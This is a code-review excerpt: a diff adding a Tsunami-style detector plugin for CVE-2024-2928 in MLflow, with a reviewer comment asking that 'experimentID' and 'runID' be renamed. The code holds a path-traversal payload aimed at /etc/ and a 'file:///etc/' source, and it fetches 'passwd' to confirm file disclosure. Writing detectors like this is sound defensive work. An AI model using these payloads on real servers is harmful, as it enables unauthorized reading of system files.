community/detectors/mlflow_cve_2024_2928/src/main/java/com/google/tsunami/plugins/detectors/cves/cve20242928/Cve20242928VulnDetector.java

```diff
@@ -0,0 +1,390 @@
+import com.google.protobuf.util.Timestamps;
+import com.google.tsunami.common.data.NetworkServiceUtils;
+import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpRequest;
+import com.google.tsunami.common.net.http.HttpResponse;
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.ForWebService;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.time.Clock;
+import java.time.Instant;
+import java.util.regex.Pattern;
+import javax.inject.Inject;
+
+/** A {@link VulnDetector} that detects the CVE-2024-2928 vulnerability. */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "CVE-2024-2928 Detector",
+    version = "0.1",
+    description = "Checks for occurrences of CVE-2024-2928 in MLflow instances.",
+    author = "frkngksl",
+    bootstrapModule = Cve20242928DetectorBootstrapModule.class)
+@ForWebService
+public final class Cve20242928VulnDetector implements VulnDetector {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+  private final Clock utcClock;
+  private static final String EXP_CREATION_PATH = "ajax-api/2.0/mlflow/experiments/create";
+  private static final String RUN_CREATION_PATH = "api/2.0/mlflow/runs/create";
+  private static final String MODEL_CREATION_PATH = "ajax-api/2.0/mlflow/registered-models/create";
+  private static final String LINK_PATH = "ajax-api/2.0/mlflow/model-versions/create";
+  private static final String EXP_DELETION_PATH = "api/2.0/mlflow/experiments/delete";
+  private static final String MODEL_DELETION_PATH = "ajax-api/2.0/mlflow/registered-models/delete";
+
+  private static final String EXP_PAYLOAD =
+      "{\"name\": \"poc\", \"artifact_location\":"
+          + " \"http:///#/../../../../../../../../../../../../../../etc/\"}";
+  private static final String RUN_PAYLOAD = "{\"experiment_id\": \"{{EXPERIMENT_ID}}\"}";
+  private static final String MODEL_PAYLOAD = "{\"name\": \"poc\"}";
+  private static final String LINK_PAYLOAD =
+      "{\"name\": \"poc\", \"run_id\": \"{{RUN_ID}}\", \"source\": \"file:///etc/\"}";
+
+  private static final String VULN_PATH =
+      "model-versions/get-artifact?path=passwd&name=poc&version=1";
+  private static final Pattern VULNERABILITY_RESPONSE_PATTERN = Pattern.compile("(root:[x*]:0:0:)");
+
+  private String experimentID;
+  private String runID;
```

Comment:
Abbreviation in names `experimentID` and `runID` must contain no more than '1' consecutive capital letters. Please rename these variables and all their occurencies.